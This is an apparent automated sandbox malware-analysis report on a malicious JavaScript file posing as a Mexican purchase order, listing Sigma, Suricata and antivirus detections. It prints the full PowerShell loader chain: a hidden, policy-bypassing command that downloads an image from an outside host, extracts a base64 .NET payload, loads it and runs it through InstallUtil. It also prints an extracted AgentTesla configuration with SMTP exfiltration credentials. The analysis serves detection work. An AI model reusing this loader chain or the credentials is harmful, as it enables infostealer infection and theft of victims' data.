? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js", CommandLine|base64offset|contains: H, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js", ProcessId: 7340, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ?

Data Obfuscation

Sigma detected: Powershell download and load assembly

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'alarvice','InstallUtil','desativado'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'alarvice','InstallUtil','desativado'))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU

Suricata Signatures

ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 - Source IP: 78.142.208.13 - Destination IP: 192.168.2.4

Timestamp:	2024-08-30T09:28:02.731307+0200
SID:	2020423
Severity:	1
Source Port:	443
Destination Port:	49731
Protocol:	TCP
Classtype:	Exploit Kit Activity Detected

ET MALWARE Malicious Base64 Encoded Payload In Image - Source IP: 207.241.227.86 - Destination IP: 192.168.2.4

Timestamp:	2024-08-30T09:28:00.364366+0200
SID:	2049038
Severity:	1
Source Port:	443
Destination Port:	49730
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

Avira URL Cloud: Label: malware

Found malware configuration

Source: 6.2.InstallUtil.exe.400000.0.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.zoho.eu", "Username": "logs@astonherald.com", "Password": "office12#"}

Source: unknown	HTTPS traffic detected: 207.241.227.86:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 78.142.208.13:443 -> 192.168.2.4:49731 version: TLS 1.2

Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdbX source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
